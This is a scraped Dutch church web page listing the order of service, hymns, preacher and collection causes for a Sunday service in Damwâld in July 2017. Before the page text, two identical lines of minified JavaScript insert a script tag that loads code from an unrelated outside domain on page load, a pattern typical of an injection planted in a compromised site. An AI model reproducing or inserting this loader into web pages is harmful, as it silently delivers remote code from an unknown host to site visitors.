;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 juli 2017 9:30 uur - PKN Damwâld
zondag 9 juli 2017
09:30 uur

Kerkdienst zondag 9 juli 2017 9:30 uur

Informatie

Voorganger:Ds. M.J. Koppe, Dokkum
Organist:Nienke van der Heide-Visser
Liturgie
Lied voor de dienst ELB 183 : 1,2 en 4
Welkom en mededelingen
Intochtslied Ps 100 : 1, 2, 3 en 4
Stilgebed , Votum en groet .
We zingen: gez 457 : 1 en 4
Kinderlied Elb 421
Gebed van verootmoediging .
We zingen: ps 62 : 1 en 5
Wetslezing
We zingen: ps 119 : 4 en 12
Gebed om de Heilige Geest .
We lezen: Matt 25 : 1 –13
We zingen: gez 300
Verkondiging
We zingen: gez 296
Collecte
Dankzegging en voorbeden .
Slotlied gez 462
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: St. Trijntje Beimers

Kilangala en Kantembo liggen allebei in het zuidwesten van Tanzania, in de arme en achtergebleven Rukwa Provincie. Beide zijn gesticht door de Friese verpleegkundige en zendelinge Trijntje Beimers, Kilangala in 1967 en Kantembo, zo'n 100 kilometer verderop, in 1976. Met financiële steun vanuit Nederland en Canada zijn de zendingsposten uitgegroeid tot bloeiende gemeenschappen die van betekenis zijn voor de omliggende regio. Sinds 2013 werken de Stichting Trijntje Beimers en het Zeister Zendingsgenootschap (ZZg) nauw samen aan de verdere ontwikkeling, met als einddoel financiële onafhankelijkheid. Zover is het nog niet, maar we zijn op weg. Ook twee andere Nederlandse stichtingen zijn betrokken bij Kilangala. Stichting Protanz houdt zich bezig met de bouw van de basisschool en Stichting SOLKO richt zich op de landbouw. Natuurlijk wordt er nauw samengewerkt met ZZg en STB.

Tweede collecte: Kerk
Uitganscollecte: Kerk